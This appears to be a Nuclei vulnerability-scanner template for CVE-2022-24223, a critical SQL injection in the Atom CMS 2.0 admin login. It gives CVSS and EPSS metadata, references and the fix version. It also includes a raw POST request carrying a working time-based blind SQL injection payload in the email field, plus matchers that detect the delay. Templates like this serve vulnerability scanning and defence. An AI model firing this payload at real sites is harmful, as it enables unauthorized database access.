46 lines
1.3 KiB
YAML
46 lines
1.3 KiB
YAML
id: CVE-2022-24223
|
|
|
|
info:
|
|
name: Atom CMS v2.0 - SQL Injection
|
|
author: theamanrawat
|
|
severity: critical
|
|
description: |
|
|
AtomCMS v2.0 was discovered to contain a SQL injection vulnerability via /admin/login.php.
|
|
remediation: Fixed in version Atom CMS v2.1
|
|
reference:
|
|
- https://packetstormsecurity.com/files/165922/Atom-CMS-2.0-SQL-Injection.html
|
|
- https://github.com/thedigicraft/Atom.CMS/issues/255
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2022-24223
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
|
cvss-score: 9.8
|
|
cve-id: CVE-2022-24223
|
|
cwe-id: CWE-89
|
|
epss-score: 0.00656
|
|
epss-percentile: 0.77153
|
|
cpe: cpe:2.3:a:thedigitalcraft:atomcms:2.0:*:*:*:*:*:*:*
|
|
metadata:
|
|
verified: true
|
|
max-request: 1
|
|
vendor: thedigitalcraft
|
|
product: atomcms
|
|
tags: packetstorm,cve,cve2022,sqli,atom,cms
|
|
|
|
http:
|
|
- raw:
|
|
- |
|
|
@timeout: 10s
|
|
POST /admin/login.php HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Content-Type: application/x-www-form-urlencoded
|
|
|
|
email={{randstr}}@gmail.com'+AND+(SELECT+2549+FROM+(SELECT(SLEEP(6)))LIzI)+AND+'uqzM'='uqzM&password={{randstr}}
|
|
|
|
matchers:
|
|
- type: dsl
|
|
dsl:
|
|
- 'duration>=6'
|
|
- 'status_code == 200'
|
|
- 'contains(body, "Admin Login") && contains(body, "Atom.SaveOnBlur")'
|
|
condition: and
|